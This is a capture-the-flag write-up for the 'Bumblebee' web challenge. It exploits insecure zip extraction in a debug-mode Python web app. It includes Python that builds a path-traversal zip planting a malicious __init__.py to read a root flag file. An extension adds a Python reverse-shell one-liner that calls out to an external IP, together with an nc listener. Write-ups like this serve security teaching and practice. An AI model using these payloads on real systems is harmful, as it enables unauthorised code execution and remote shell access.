CTFtime.org

Bumblebee

by nghialuffy / Em0t3t

Tags: web 

Rating:

# Bumblebee (491 Points - Web - 31 Solves)

## GET INFO

This is home page. We can upload the zip file with file extension ".flower". Web server will extract that.

+ ![](./img/home.png)

When we upload another file with file extension ".flower" (not zip file), web server will show debug page.

+ ![](./img/debug_page_1.png)

+ ![](./img/debug_page_2.png)

+ ![](./img/debug_page_3.png)

We can see something interesting here. The BASE_DIR is "/usr/src/app" and the app in "/usr/src/app/bumblebee"

Something else?

+ ![](./img/debug.png)

DEBUG is True, so when something change in "/usr/src/app/bumblebee". Web server will reload with new code.

## Idea

The Idea is we upload the zip file, which has ```__init__.py``` into. And when web server extract the zip file. ```__init__.py``` will extract into "/usr/src/app/bumblebee"

## Coding timeee

```py
import zipfile
# with that name file, when it has extracted, __init__.py would be in "usr/src/app/bumblebee"
z_info = zipfile.ZipInfo(r"../../../../../../usr/src/app/bumblebee/__init__.py")
z_file = zipfile.ZipFile("payload.flower", mode="w")

z_file.writestr(z_info, """
import os
dir = os.popen('cat /root/flag.txt').read()
open("/tmp/nectar/flag.txt", "w").write(dir)
""") # This code will copy the file in /root/flag.txt and write in /tmp/nectar
# that code for change mode the __init__.py file
z_info.external_attr = 0777 << 16L
z_file.close()
```

## Exploit

Now, we will upload file payload.flower and wait a few minuter.

+ ![](./img/uploaded.png)

We can see flag in http://challenge.ctf.games:30366/nectar/

+ ![](./img/flag_1.png)

+ ![](./img/flag_2.png)




# Extension: We can reverse shell this server

## GET PUBLIC IP

- First, we open port 6969 ngrok with protocol tcp

+ ![](./img/ngrok.png)

- Use nslookup to see our ip.

+ ![](./img/your_ip.png)

- Now, MY_IP is ```3.19.130.43``` and MY_PORT is ```11799```

- Use ```nc -lvnp 6969``` to be able to receive the reverse shell. Remenber, we open port ```6969``` in my computer to receive, not ```11799```.

## Coding time againnn

```py
import zipfile
# with that name file, when it has extracted, __init__.py would be in "usr/src/app/bumblebee"
z_info = zipfile.ZipInfo(r"../../../../../../usr/src/app/bumblebee/__init__.py")
z_file = zipfile.ZipFile("payload.flower", mode="w")
z_file.writestr(z_info, """
import os,pty,socket;s=socket.socket();s.connect(("3.19.130.43",11799));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")
""") # This code will excute reverse shell
# that code for change mode the __init__.py file
z_info.external_attr = 0777 << 16L
z_file.close()
```

## Exploit

+ ![](./img/reverse_shell.png)

## Find flag

+ ![](./img/find_flag.png)

Ref: https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution

By: nghialuffy

Original writeup (https://github.com/Em0t3t/H-cktivityCon-2021-CTF/tree/main/Web/Bumblebee).

Comments